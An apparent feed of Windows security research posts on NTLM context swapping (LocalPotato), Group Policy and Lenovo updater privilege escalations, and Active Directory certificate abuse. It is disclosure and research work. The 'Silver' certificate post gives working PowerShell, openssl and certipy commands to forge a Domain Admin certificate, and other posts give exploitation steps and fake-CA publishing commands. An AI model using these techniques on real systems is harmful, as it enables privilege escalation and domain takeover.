Whenever I need to debug a protected process, I usually disable the protection in the Kernel so that I can attach a User-mode debugger. This has always served me well until it sort of backfired. The problem with protected processes The problem with protected processes, when it comes to debugging, is basically that they are… protected. Jokes aside, this means that, as you know, you cannot atta...

Insomni'hack 2023 CTF Teaser - InsoBug

By: itm4n
25 January 2023 at 23:00
For this edition of Insomni’hack, I wanted to create a special challenge based on my knowledge of some Windows internals. In this post, I will share some thoughts about the process and, most importantly, provide a detailed write-up. Personal thoughts I want to start this post by sharing a few thoughts on CTFs and the process of creating a challenge. If you want to skip this part, feel free to...

LocalPotato – When Swapping The Context Leads You To SYSTEM

By: Decoder
13 February 2023 at 10:23

Here we are again with our (me and @splinter_code) new *potato flavor, the LocalPotato! This was a cool finding so we decided to create a dedicated website 😉

The journey to discovering the LocalPotato began with a hint from our friend Elad Shamir, who suggested examining the “Reserved” field in NTLM Challenge messages for potential exploitation opportunities.

After extensive research, it ended up with the “LocalPotato”, a not-so-common NTLM reflection attack in local authentication allowing for arbitrary file read/write. Combining this arbitrary file write primitive with code execution allowed us to achieve a full chain elevation of privilege from user to SYSTEM.

We reported our findings to the Microsoft Security Response Center (MSRC) on September 9, 2022, and it was resolved with the release of the January 2023 patch Tuesday and assigned the CVE number CVE-2023-21746.


Local NTLM Authentication

The NTLM authentication mechanism is part of the NTLMSSP (NTLM Security Support Provider), which is supported by the Windows security framework called SSPI (Security Support Provider Interface).
SSPI provides a flexible API for handling authentication tokens and supports several underlying providers, including NTLMSSP, SPNEGO, Kerberos, etc…

The NTLM authentication process involves the exchange of three types of messages (Type 1, Type 2, and Type 3) between the client and the server, processed by the NTLMSSP.
The SSPI authentication handshake abstracts away the details of NTLM and allows for a mechanism-independent means of applying authentication, integrity, and confidentiality primitives.

Local authentication is a special case of NTLM authentication in which the client and server are on the same machine.
The client acquires the credentials of the logged-in user and creates the Type 1 message, which contains the workstation and domain name of the client.
The server examines the domain and workstation information and initiates local authentication if they match.
The client then receives the Type 2 message from the server and checks the presence of the “Negotiate Local Call” flag to determine if the security context handle is valid.
If it is, the default credentials are associated with the server context, and the resulting Type 3 message is empty.
The server then verifies that the security context is bound to a user, and if so, authentication is complete.

In summary, during local authentication, the “Reserved” field which is usually set to zero for non-local authentication in the NTLM type 2 message, will reference the local server context handle that the client should associate to.

In the above figure, we have highlighted the Reserved field containing the upper value of the context handle.

The Logic Bug

The NTLM authentication through SPPI is often misunderstood to involve direct mutual authentication between the client and server. However, in reality, the local authenticator (LSASS) is always involved, acting as the intermediary between the two.
It is responsible for creating the messages, checking the identity permissions, and generating the proper tokens. 

The objective of our research was to intercept a local NTLM authentication as a non-privileged local or domain user, and “swap” the contexts (NTLM “Reserved” field) with that of a privileged user (e.g. by coercing an authentication). 

This would allow us to authenticate against a server service with these credentials, effectively exchanging the identity of our low-privileged user with a more privileged entity like SYSTEM. If successful, this would indicate that there are no checks in place to validate the Context exchanged between the two parties involved in the authentication.

The attack flow is as follows:

  • Coerce the authentication of a privileged user against our server.
  • Initiate an NTLM authentication of our client against a server service.
  • Interception of the context “B” (Reserved bytes) of the NTLM Type 2 message coming from the server service where our unprivileged client is trying to authenticate.
  • Retrieval of the context “A” (Reserved bytes) of the NTLM Type 2 message produced by our server when the privileged client tries to authenticate.
  • Swap context A with B so that the privileged client will authenticate against the server service on behalf of the unprivileged client and vice versa.
  • Retrieve both NTLM Type 3 empty response messages and forward them in the correct order to complete both authentication processes.
  • As a result of the context swap, the Local Security Authority Subsystem (LSASS) will associate context B with the privileged identity and context A with the unprivileged identity. This results in the swap of contexts, allowing our malicious client to authenticate on behalf of the privileged user.

Below is a graphical representation of the attack flow:

To validate our assumptions about the context swap attack we did set up a custom scenario.
In our experiment, we used two socket servers and two socket clients to authenticate via NTLM with different users and exchange each other’s “context”.
Both parties were negotiating the NTLM authentication over a socket through SSPI.
In particular the clients with two calls to InitializeSecurityContext() and the servers with two calls to AcceptSecurityContext().

After some adjustments, we were successful in swapping identities and we were able to trick LSASS by associating  the context with the “wrong” server. 

To exploit this in a real-world scenario, we then had to find a useful trigger for coercing a privileged client and an appropriate server service.

The Triggers for coercing a privileged client

Based on our previous research, we identified two key triggers for coercing a privileged client: the BITS service attempting to authenticate as the SYSTEM user via HTTP on port 5985 (WinRM), and authenticated RPC/DCOM privileged user calls.

RogueWinRM is a technique that takes advantage of the BITS service’s attempt to authenticate as the SYSTEM user via HTTP on port 5985. Since this port is not enabled by default on Windows 10/11, it provides an opportunity to implement a custom HTTP server that can capture the authentication flow. This allows us to obtain SYSTEM-level authentication.

RemotePotato0 is a method for coercing privileged authentication on a target machine by taking advantage of standard COM marshaling. In our scenario, we discovered three interesting default CLSIDs that authenticate as SYSTEM:

  1. CLSID: {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}
    The ActiveX Installer Service “AxInstSv” is available only on Windows 10/11.
  2. CLSID: {854A20FB-2D44-457D-992F-EF13785D2B51}
    The Printer Extensions and Notifications Service “PrintNotify” is available on Windows 10/11 and Server 2016/2019/2022.
  3. CLSID: {A9819296-E5B3-4E67-8226-5E72CE9E1FB7}
    The Universal Print Management Service “McpManagementService” is available on Windows 11 and Server 2022.

By leveraging one of these triggers we could have the proper privileged identity to abuse.

Exploiting a server service 

Initially, we tried to find a privileged candidate for our server service by examining the exposed RPC services, such as the Service Control Manager. However, we encountered a problem with local authentication to RPC services, as it is not possible to perform any reflection or relay attacks due to mitigations in the RPC runtime library (rpcrt4.dll).

As explained in this blog post by James Forshaw, Microsoft has added a mitigation in the RPC runtime to prevent authentication relay attacks from being successful.
This is done in “SSECURITY_CONTEXT::ValidateUpgradeCriteria()” by checking if the authentication for an RPC connection was from the local system, and if so, setting a flag in the security context. The server will then reject the RPC call if this flag is set, before any code is called in the server. The only way to bypass this check is to either have authentication from a non-local system or have an authentication level of RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or higher, which requires knowledge of the session key for signing or encryption which of course mitigate effectively any relaying attempts.

Next, we turned our attention to the SMB server, with the goal of performing an arbitrary file write with elevated privileges. 

The only requirement was that the SMB server should not require signing, which is the default for servers that are not Domain Controllers. 

However, we found that the SMB protocol also has some mitigations in place to prevent cross-protocol reflection attacks. 

This mitigation, also referred as CVE-2016-3225, has been released to address the WebDAV->SMB relaying attack scenario.

Basically, it requires the use of the SPN “cifs/127.0.0.1” when initializing local authentication through InitializeSecurityContext() for connecting to the SMB server, even for authentication protocols other than Kerberos, such as NTLM.

The main idea behind this mitigation is to prevent relaying local authentication between two different protocols, which would result in an SPN mismatch in the authenticator and ultimately lead to an access denied error.

According to James Forshaw article “Windows Exploitation Tricks: Relaying DCOM Authentication“, it is possible to trick a privileged DCOM client into using an arbitrary Service Principal Name (SPN) to forge an arbitrary Kerberos ticket.
While this applies for Kerberos, it turns out that it can also affect the SPN setting in an NTLM authentication.
For this reason we chose to use the RPC/DCOM trigger for coercing a privileged client because we could return an arbitrary SPN in the binding strings of the Oxid resolver, thus bypassing the SMB anti-reflection mechanism.
All we needed to do was to set an SPN of “cifs/127.0.0.1” in the originating privileged client, which was not a problem thanks to our trigger:

In the end, we were able to write an arbitrary file with SYSTEM privileges and arbitrary contents.
The network capture of the SMB packets shows us successfully authenticating to the C$ share as the SYSTEM user and overwriting the file PrintConfig.dll:

The POC

Creating a proof of concept for LocalPotato was a challenging task as it required writing SMB packets and sending them through the loopback interface for low-level NTLM authentication, accessing the local share, and finally writing a file.
We relied on Wireshark captures and Microsoft’s MS-SMB2 protocol specifications to complete the process. After multiple tests and code adjustments, we were finally successful.


To simplify the attack chain, we opted to eliminate the redirection to a non-Windows machine listening on port 135 and instead have the fake oxid resolver running on the Windows victim machine, so that the Potato trigger is local and the whole attack chain is fully local.

Just like we did in JuicyPotatoNG, we leveraged the SPPI hooks to manipulate NTLM messages coming to our COM server from the privileged client, enabling the Context Swapping.

There are various methods to weaponize an arbitrary file write into code execution as SYSTEM, such as using an XPS Print Job or NetMan DLL Hijacking. So you are free to combine the LocalPotato primitive with what you prefer 😉

Converting an arbitrary file write into EoP is relatively straightforward.
In our case, we utilized the McpManagementService CLSID on a Windows 2022 server, overwrote the printconfig.dll library, and instantiated the PrintNotify object.
This forced the service to load our malicious PrintConfig.dll, granting us a SYSTEM shell:

The LocalPotato POC is available at → https://github.com/decoder-it/LocalPotato

The Patch

The main focus of the analysis was the function SsprHandleChallengeMessage(), which handles NTLM challenges. 

The LocalPotato vulnerability was found in the NTLM authentication scheme. To locate the source of the vulnerability, we conducted a binary diff analysis of msv1_0.dll, the security package loaded into LSASS to handle all NTLM-related operations:

We observed the addition of a new check for the enabled feature “Feature_MSRC74246_Servicing_NTLM_ServiceBinding_ContextSwapping” when authentication occurs:

The check introduced by Microsoft ensures that if the ISC_REQ_UNVERIFIED_TARGET_NAME flag is set and an SPN is present, the SPN is set to NULL. 

This change effectively addresses the vulnerability by disrupting this specific exploitation scenario. 

The SMB anti-reflection mechanism checks for the presence of a specific SPN, such as “cifs/127.0.0.1”, to determine whether to allow or deny access. With the patch in place, a NULL value will be found, thus denying the authentication.
It’s important to note that the ISC_REQ_UNVERIFIED_TARGET_NAME flag is passed and used by the DCOM privileged client, but prior to this patch, it was not taken into consideration for NTLM authentication.

Microsoft has released patches for supported versions of Windows, but don’t worry if you have an older version. 0patch provides fixes for LocalPotato for unsupported versions as well!

Conclusion

In conclusion, the LocalPotato vulnerability highlights the weaknesses of the NTLM authentication scheme in local authentication. 

Microsoft has resolved the issue with the release of the patch CVE-2023-21746, but this fix may just be a workaround as detecting forged context handles in the NTLM protocol may be difficult.

It is important to note that this type of attack is not specific to the SMB or RPC protocols, but rather a general weakness in the authentication flow.
Other protocols that use NTLM as authentication method may still be vulnerable, provided exploitable services can be found.

What’s next?

Well, to be honest, we ran out of ideas. But for sure, if we’ll find something new it will be the “Golden Potato”!

Acknowledgments

Our thanks go to these two top security researchers:

  • Elad Shamir (@elad_shamir) who gave us the initial idea and with whom we constantly discussed and debated this topic

James Forshaw (@tiraniddo) who gave us useful hints when everything seemed to be lost

EoP via Arbitrary File Write/Overwite in Group Policy Client “gpsvc” – CVE-2022-37955

By: Decoder
16 February 2023 at 14:11

Summary

A standard domain user can exploit Arbitrary File Write/Overwrite with NT AUTHORITY\SYSTEM under certain circumstances if Group Policy “File Preference” is configured. I reported this finding to ZDI and Microsoft fixed this in CVE-2022-37955

Versions Affected

Tests (April 06, 2022) were conducted on the following Active Directory setup:

  • Domain computer: Windows 10/Windows 11 & Windows Insider 11/Windows Member Server 2022,  latest releases and fully patched
  • Domain controller: Windows Server 2016/2019/2022 with Active Directory functional level 2016

Prerequisites                          

A  Files preference Domain Group Policy has to be configured.

According to Microsoft this policy allows you to:

If such a policy is configured and a standard user has write access to the source and destination folder (not so uncommon scenario), it is possible to perform file write/overwrite with SYSTEM privileges by abusing symlinks thus elevating privileges to Administrator/SYSTEM.

A standard user can easily verify the presence and configuration of such a policy by looking for “Files.xml” in the SYSVOL share of the domain controllers.

GPO Setup

To achieve the arbitrary file write exploitation, it is required to create a new Group Policy “File Preference”

In the following screenshot the setup of the policy:

In this example, the policy will copy the file source.dat from c:\sourcedir to dest.dat in c:\destdir.

The key point here is that these operations are performed without impersonation, running under the SYSTEM context.

Arbitrary File Write                              

Due to the incorrect handling of links created via Windows Objectmanager’s symbolic links, it is possible to exploit this operation and place user-controlled content in any System protected location.

Exploitation steps

  1. Create the directories if they do not exist and ensure “destdir” is empty
  2. Copy a malicious dll/exe or whatever in c:\sourcedir with the name “source.dat”
  3. Create a symbolic link pointing destination  destdir/file to a system-protected directory:
  4. Perform a gpupdate /force

As can be noticed from the previous screenshot, the domain user was able to copy a file in a system protected directory by controlling the contents and the name.  The screenshot of “procom” tool confirms the operations:

Having the possibility to create a user-controlled file in protected directories opens endless privilege escalation possibilities. One of the easiest ways is to overwrite “Printconfig.dll” located in “C:\Windows\System32\spool\drivers\x64\3” with the malicious dll, and instantiate the PrintNotify object which will force the service to load our malicious PrintConfig.dll, granting us a SYSTEM shell:

To replicate the findings reported in this report, Defender was disabled.

Possible causes

A possible root problem can be identified within the function located in gpprefcl.dll which does not properly check the presence of junction points and symlinks:

The Fix                           

Microsoft enforced the Redirection Guard for the Group Policy Client to prevent a process from following a junction point if it was created with a lower integrity level.


This successfully resolved all the security issues with Group Policy processing, many of which had been reported and partially addressed.

Thats all 😉

Bypassing PPL in Userland (again)

By: itm4n
16 March 2023 at 23:00
This post is a sequel to Bypassing LSA Protection in Userland and The End of PPLdump. Here, I will discuss how I was able to bypass the latest mitigation implemented by Microsoft and develop a new Userland exploit for injecting arbitrary code in a PPL with the highest signer type. The current state of PP(L)s My previous work on protected processes (see Bypassing LSA Protection in Userland) yi...

From NTAuthCertificates to “Silver” Certificate

By: Decoder
5 September 2023 at 16:22

In a recent assessment, I found that a user without special privileges had the ability to make changes to the NTAuthCertificates object. This misconfiguration piqued my curiosity, as I wanted to understand how this could potentially be exploited or misused.

Having write access to the NTAuthCertificates object in Windows Active Directory, which is located in the Configuration Partition, could potentially have significant consequences, as it involves the management of digital certificates used for authentication and security purposes.

The idea behind a possible abuse is to create a deceptive self-signed Certification Authority (CA) certificate and include it in the NTAuthCertificates object. As a result, any fraudulent certificates signed by this deceptive certificate will be considered legitimate. This technique, along with the Golden Certificate, which requires the knowledge of the Active Directory Certification Server (ADCS) private key, has been mentioned in the well-known research Certified Pre-Owned published a couple of years ago.

In this blog post, I will document the necessary steps and prerequisites needed for forging and abusing authentication certificates on behalf of any user obtained from a fake CA.

So this is the scenario, reproduced in my lab with the adsiedit.exe tool

If you prefer to do it with the command line, in this case, Powershell, with the ActiveDirectory module installed:

$user = Get-ADuser user11
$dn="AD:CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mylab,DC=local"
$acl = Get-Acl $dn
$sid = $user.SID
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $sid,"GenericAll","ALLOW",([GUID]("00000000-0000-0000-0000-000000000000")).guid,"All",([GUID]("00000000-0000-0000-0000-000000000000")).guid))
Set-Acl $dn $acl
(get-acl -path $dn).access

Now that we are aware that our user (user11 in this case), has control over this object, we first need to create a fake self-signed Certification Authority. This can be easily done with openssl tools.

#generate a private key for signing certificates:
openssl genrsa -out myfakeca.key 2048
#create and self sign the root certificate:
openssl req -x509 -new -nodes -key myfakeca.key -sha256 -days 1024 -out myfakeca.crt

When self signing the root certificate you can leave empty all information you will be asked for, except the common name which should reflect your fake CA name as shown in the figure below:

We need to add the public key of our fake CA (myfakeca.crt) in the cACertificate attribute stored in NTAuthCertificates object, which defines one or more CA that can be used during authentication. This can be done easily with the default certutil tool:

Let’s check if it worked:

Yes, it worked. We have now 2 entries! Now that we have added our fake CA cert, we also need to create the corresponding pfx file which will be used later in the exploitation tools.

cat myfakeca.key > myfakeca.pem
cat myfakeca.crt >> myfakeca.pem
openssl pkcs12 -in myfakeca.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out myfakeca.pfx

Everything is set up, so we could try to forge a certificate for authenticating the Domain Admin. In this example, we will use the certipy tool, but you could also use the ForgeCert tool on Windows machines

certipy forge -ca-pfx myfakeca.pfx -upn [email protected] -subject 'CN=Administrator,OU=Accounts,OU=T0,OU=Admin,DC=mylab,DC=local'
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'administrator_forged.pfx'

Once we get the forged cert let’s try to authenticate:

certipy auth -pfx administrator_forged.pfx -dc-ip 192.168.212.21
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[] Using principal: [email protected] [] Trying to get TGT…
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)

Hmmm, this was somehow expected. The certificate is not trusted, probably we need to add our fake CA to the trusted certification authorities in the DC. But wait, this means that you need high privileges in order to do this, so we have to abandon the idea of kind of privilege escalation and think about this technique as a possible persistence mechanism. Let’s add it to the DC:

Bad news,wehen we try to authenticate again, we still get the error message KDC_ERROR_CLIENT_NOT_TRUSTED

What’s happening? Well, maybe the change in NTAuthCertificates has not been reflected on the DC’s local cache (we updated it as a standard user on a domain-joined PC) which is located under the registry key:

HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates

On the DC, we have only one entry that corresponds to the legitimate CA. Normally this entry is aligned with the group policy update, so we could force the update without waiting for the next run (had some issues as it did not always work, needs more investigation) or run certutil to populate the cache:

Looks good, so now it should work. But guess what, bad news again! KDC_ERROR_CLIENT_NOT_TRUSTED

What’s still wrong? After some research, I figured out that maybe I have a problem with the Certification Revocation List (CRL) which is checked on a regular basis, at least the first time we use a certificate produced by the new CA. So we have to configure a CRL distribution point for my fake CA, which luckily can be done using again openssl ;).

First of all, we need to create a ca.conf file. I did this on my Linux box.

[ca]
default_ca = MYFAKECA
[crl_ext]
authorityKeyIdentifier=keyid:always
[MYFAKECA]
unique_subject = no
certificate = ./myfakeca.crt
database = ./certindex
private_key = ./myfakeca.key
serial = ./certserial
default_days = 729
default_md = sha1
policy = myca_policy
x509_extensions = myca_extensions
crlnumber = ./crlnumber
default_crl_days = 729
[myca_policy]
commonName = supplied
stateOrProvinceName = supplied
countryName = optional
emailAddress = optional
organizationName = supplied
organizationalUnitName = optional
[myca_extensions]
basicConstraints = CA:false
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
keyUsage = digitalSignature,keyEncipherment
extendedKeyUsage = serverAuth
crlDistributionPoints = URI:http://192.168.1.88/root.crl

We need to run some openssl commands to produce the necessary files:

openssl genrsa -out cert.key 2048
#ensure that common name is different from your fake CA
openssl req -new -key cert.key -out cert.csr
touch certindex
echo 01 > certserial
echo 01 > crlnumber
openssl ca -batch -config ca.conf -notext -in cert.csr -out cert.crt
openssl pkcs12 -export -out cert.p12 -inkey cert.key -in cert.crt -chain -CAfile myfakeca.crt
openssl ca -config ca.conf -gencrl -keyfile myfakeca.key -cert myfakeca.crt -out rt.crl.pem
openssl crl -inform PEM -in rt.crl.pem -outform DER -out root.crl

Finally have our root.crl file, all we need is to setup a minimalistic HTTP server:

python3 -m http.server 80

In certipy we need to specify our CRL distribution point:

certipy forge -ca-pfx myfakeca.pfx -upn [email protected] -subject 'CN=Administrator,OU=Accounts,OU=T0,OU=Admin,DC=mylab,DC=local' -crl 'http://192.168.1.88/root.crl'
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'administrator_forged.pfx'
certipy auth -pfx administrator_forged.pfx  -dc-ip 192.168.212.21

Bingo! It works, the DC is contacting our CRL distribution point and we are able to authenticate via PKINIT as a domain admin and get his NT hash…. Let’s do it with rubeus

It worked again! Let’s check if we can access the C$ share on the DC now:

At the conclusion of our experiment, we can draw the following conclusions

  • Having only write access to NTAuthCertificates is obviously not sufficient to perform a privilege escalation by using forged certificates issued by a fake CA for authentication. You might end up creating client authentication issues by removing the legitimate CA certificate from NTAuthCertificates
  • You need to add the fake CA to the trusted Certification Authorities and ensure that the local cache is populated on target Domain Controller
  • On a machine under your control, you need to set a CRL distribution point (not sure if this can be skipped)
  • As I mentioned, this is a persistence technique that is not very stealthy, you can for example monitor events logs 4768 and verify the Certificate Issuer Name, monitor NTAuthCertificates object changes, etc…

And this is why, just for fun, I called this the “Silver” certificate 😉

CVE-2022-41099 - Analysis of a BitLocker Drive Encryption Bypass

By: itm4n
13 August 2023 at 22:00
In November 2022, an advisory was published by Microsoft about a BitLocker bypass. This vulnerability caught my attention because the fix required a manual operation by users and system administrators, even after installing all the security updates. Couple this with the fact that the procedure was not well documented initially, and you have the perfect recipe for disaster. This is typically th...

A Deep Dive into TPM-based BitLocker Drive Encryption

By: itm4n
14 September 2023 at 22:00
When I investigated CVE-2022-41099, a BitLocker Drive Encryption bypass through the Windows Recovery Environment (WinRE), the fact that the latter was able to transparently access an encrypted drive without requiring the recovery password struck me. My initial thought was that there had to be a way to reproduce this behavior and obtain the master key from the Recovery Environment (WinRE). The o...

CVE-2023-4632: Local Privilege Escalation in Lenovo System Updater

By: enigma0x3
26 October 2023 at 16:56

Version: Lenovo Updater Version <= 5.08.01.0009

Operating System Tested On: Windows 10 22H2 (x64)

Vulnerability: Lenovo System Updater Local Privilege Escalation via Arbitrary File Write

Advisory: https://support.lenovo.com/us/en/product_security/LEN-135367

Vulnerability Overview

The Lenovo System Update application is designed to allow non-administrators to check for and apply updates to their workstation. During the process of checking for updates, the privileged Lenovo Update application attempts to utilize C:\SSClientCommon\HelloLevel_9_58_00.xml, which doesn’t exist on the filesystem. Due to the ability for any low-privileged user to create a directory in the root of the C:\ drive, it’s possible to provide the privileged Lenovo System Update application a specially crafted HelloLevel_9_58_00.xml file, which is located in C:\SSClientCommon. This custom XML file contains a source and destination file path, which the Lenovo System Update application parses when the user checks for updates. Once parsed, the privileged Lenovo System Update application moves the source file to the destination location and allows for an arbitrary file write primitive, thus resulting in elevation of privilege to NT AUTHORITY\SYSTEM

Vulnerability Walkthrough

When a user checks for Lenovo updates via the Lenovo System Update application, Tvsukernel.exe is launched as the user Lenovo_tmp_<randomCharacters> in a privileged, High Integrity context. Upon execution, Tvsukernel.exe checks for HelloLevel_9_58_00.xml in C:\SSClientCommon, shown below in Figure 01.

Figure 01 – Missing Directory and XML File

By default, all versions of Windows allow for low-privileged users to create directories within the root of the C:\ drive. An attacker can manually create the directory C:\SSClientCommon\ and then place HelloLevel_9_58_00.xml within it, shown below in Figure 02.

Figure 02 — Directory and XML Creation in Root of C:\ Drive

After C:\SSClientCommon is created, an attacker can then create the required subdirectory C:\SSClientCommon\UTS, which will contain the attacker’s malicious binary. The directory structure for the attack looks similar to Figure 03 below:

Figure 03: Final Folder and File Structure

Since HelloLevel_9_58_00.xml resides in a location that an attacker can control, it is possible to craft a custom XML file that allows an attacker to move a file from one location to another. This is possible because the custom XML defines an “execute” action, providing a “Source” and “Destination” path. The “SourcePath” element defines a portable executable (PE) file located within C:\SSClientCommon\UTS–in this case, C:\SSClientCommon\UTS\poc2.exe.

The “DestinationPath” node defines the location in which the source file is to be copied to, shown below in Figure 04:

Figure 04 – Custom XML Source and Destination Paths

After the Lenovo System Update application launches and checks for updates, the privileged process (i.e., Tvsukernel.exe)checks to see whether C:\SSClientCommon\HelloLevel_9_58_00.xml exists. Since the path has been created and a custom XML file planted, Tvsukernel.exe will move the custom HelloLevel_9_58_00.xml file to C:\ProgramData\Lenovo\SystemUpdate\sessionSE\system\SSClientCommon\HelloLevel_9_58_00.xml, shown below in Figure 05:

Figure 05: Writing Custom XML to ProgramData

Once the XML file is moved, Tvsukernel.exe calls the ParseUDF() function within Client.dll in order to parse the XML file located in C:\ProgramData\Lenovo\SystemUpdate\sessionSE\system\SSClientCommon\HelloLevel_9_58_00.xml. When Tvsukernel.exe parses the XML, it prepends the DestinationPath contained in the XML with C:\ProgramData\Lenovo\SystemUpdate\sessionSE\, shown below in Figure 06:

Figure 06: XML Parsing in ParseUDF()

In the custom attacker-controlled XML file, it is possible to use directory traversal to break out of the replaced C:\ProgramData\Lenovo\SystemUpdate\sessionSE\ DestinationPath value. An attacker can leverage this to choose any location on the operating system, thus resulting in an arbitrary file write primitive. In this case, directory traversal was used to set the DestinationPath value to C:\Program Files (x86)\Lenovo\System Update\SUService.exe, shown below in Figure 07. This is due to the fact that the Lenovo Updater tries to launch this application as NT AUTHORITY\SYSTEM each time the Lenovo System Updater is launched.

Figure 07: Directory Traversal in Custom XML

With the custom XML created and placed in C:\SSClientCommon\HelloLevel_9_58_00.xml and a malicious binary placed in C:\SSClientCommon\UTS\poc2.exe, an attacker can simply open the Lenovo System Update application and check for updates. Upon execution, Tvsukernel.exe will move the malicious C:\SSClientCommon\HelloLevel_9_58_00.xml to C:\ProgramData\Lenovo\SystemUpdate\sessionSE\system\SSClientCommon\HelloLevel_9_58_00.xml, parse it, and then move C:\SSClientCommon\UTS\poc2.exe to C:\Program Files (x86)\Lenovo\System Update\SUService.exe; overwriting the SUService.exe binary, shown below in Figure 08:

Figure 08: Overwriting Lenovo SUService.exe Service Binary

With Lenovo’s SUService.exe binary overwritten with a custom application, an attacker can close and re-open the Lenovo System Update application, which will cause the attacker’s application to execute as NT AUTHORITY\SYSTEM. In this case, poc2.exe gets the username of the currently executing user and writes it out to C:\Windows\POCOutput.txt, shown below in Figure 09:

Figure 09: Code Execution as NT AUTHORITY\SYSTEM

This vulnerability has been fixed in the latest version of the Lenovo System Updater application.

Lenovo’s Advisory can be found here: https://support.lenovo.com/us/en/product_security/LEN-135367

LocalPotato HTTP edition

By: Decoder
3 November 2023 at 16:54

Microsoft addressed our LocalPotato vulnerability in the SMB scenario with CVE-2023-21746 during the January 2023 Patch Tuesday. However, the HTTP scenario remains unpatched, as per Microsoft’s decision, and it is still effective on updated systems.

This is clearly an edge case, but it is important to be aware of it and avoid situations that could leave you vulnerable.

In this brief post, we will explain a possible method of performing an arbitrary file write with SYSTEM privileges starting from a standard user by leveraging the context swap in HTTP NTLM local authentication using the WEBDAV protocol.

For all the details about the NTLM Context swapping refer to our previous post.

Lab setup

First of all, we need to install IIS on our Windows machine and enable Webbav, The following screenshot is taken from Windows 11, but is quite similar on Windows servers as well.

Upon enabling WEBDAV, the next step is to create a virtual directory under our root website. In this instance, we’ll name it webdavshare and mount it, for the sake of simplicity, on the C:\Windows directory.

We need to permit read/write operations on this share by adding an authoring rule:

Last but not least, we need to enable NTLM authentication and disable all the other methods:

Exploiting context swapping with http/webdav

In our latest LocalPotato release, we have added and “hardcoded” this method with http/webdav protocol. The tool will perform an arbitrary file write with SYSTEM privileges in the location specified in the webdav share with a static content of “we always love potatoes”. Refer to the source code for all the details, it’s not black magic 🙂

You can certainly modify the code and tailor it to your specific needs, depending on the situation you encounter 😉

A “deep dive” in Cert Publishers Group

By: Decoder
20 November 2023 at 17:03

While writing my latest post, my attention was also drawn to the Cert Publishers group, which is associated with the Certificate service (ADCS) in an Active Directory Domain.

I was wondering about the purpose of this group and what type of permissions were assigned to its members. I was also curious to understand if it was possible to exploit this membership to acquire the highest privileges within a domain. By default, this group contains the computer accounts hosting the Certification Authority and Sub CA. It is not clear whether this group should be considered really highly privileged, and I have not found any documentation of potential abuse. For sure, CA and SubCA Windows servers should be considered highly privileged, even just for the fact that they can do backups of the CA keys…

Last but not least, Microsoft does not protect this group by AdminSDHolder:

What is the purpose of Cert Publishers?

Microsoft’s official documentation on this group is not very clear nor exhaustive:

Members of the Cert Publishers group are authorized to publish certificates for User objects in Active Directory.

What does this mean? Members of the group have write access to the userCertificate attribute of users and computers and this permission is also controlled by the AdminSDholder configuration:

The userCertificate attribute is a multi-valued attribute that contains the DER-encoded X509v3 certificates issued to the user. The public key certificates issued to this user by the Microsoft Certificate Service are stored in this attribute if the “Publish to Active Directory” is set in the Certificate Templates, which is the default for several certificate templates:

Should you accept this default setting? In theory, this would be useful when using Email Encryption, Email Signing, or Encrypted Files System (EFS). I see no other reason and if you don’t need it remove this flag 😉

From the security perspective, as far as I know, no reasonable path could permit an attacker to elevate the privileges by altering the certificates stored in this attribute.

There could be in theory a denial of service attack by adding a huge amount of certificates to the attribute to create replication issues between DC’s, but in my tests, I was not able to reproduce this given that there seems to be a hard limit of around 1200 certificates (or maybe a limit on the size), at least in a Windows AD 2016.

So if you really need this attribute, at least check “Do not automatically reenroll..” which will prevent uncontrolled growth of this attribute.

Is there anything else they can do? Yes!

Permissions granted to cert Publishers in Configuration Partition

Cert Publishers have control over some objects located under the “Public Key Services” container of Configuration Partition of AD:

  • CN=AIA,CN=Public Key Services,CN=Services,CN=Configuration,DC=…

Authority Information Access (AIA) is used to indicate how to access information and services related to the issuer of the certificate.

From Pkisolutions:

This container stores the intermediate CA and cross-certificates. All certificates from this container are propagated to each client in the Intermediate Certification Authority certificates store via Group Policy.

Cert Publishers have full control over it, so they can create new entries with fake certificates via certutil or adsiedit, for example:

certutil -dspublish -f fakeca.crt subCA  (sub CA)
certutil -dspublish -f fakeca.crt crossCA  (cross CA)

But the resulting published fake certificates in the intermediate CA will not be trusted due to missing root CA, so probably that is not useful…
We have also to keep in mind that Cert Publishers cannot modify the original AIA object created during the installation of the CA:

  • CN=[CA_NAME],CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC= …

Certificate Revocation List Distribution Point (CDP) provides information on where to find the CRL associated with the certificate.

Members of Cert Publishers have full control over this container and subsequent objects. But what’s the purpose of this container in ADCS?

From Pkisolutions:
“This container is used to store certificate revocation lists (CRL). To differentiate CRLs a separate container is created for each CA. Typically CA host NetBIOS name is used. CRLs from CDP containers are NOT propagated to clients and is used only when a certificate refers to a particular CRLDistributionPoint entry in CDP container.”

Members could overwrite attributes of the existing object, especially the certificateRevocationList and deltaRevocationList attribute with a fake one or just remove it. However given that these configurations are not replicated to clients, these permissions are not very useful from an attacker’s perspective.

It’s worth noting that Cert Publishers cannot modify the extensions relative to AIA/CDP configuration of the CA server:

  • CN=[CA_NAME],CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=..

This container stores trusted root certificates. The root certificate of the CA server is automatically placed inside and the certificates will be published (via GP) under the trusted root certification authorities.

While Cert Publishers have full control over the CA_NAME object, they are unable to add other certification authority objects. This restriction is probably in place to mitigate the risk of a malicious user, who is a member of the group, from publishing fake CA certificates. Such fake certificates could potentially be trusted by all clients. Hence, what are the potential abuse scenarios to consider?

Abusing the Certification Authorities object

My objective was to explore potential workarounds to have my fake Certificate Authority (CA) published and accepted as trustworthy by all clients, despite the established limitations.

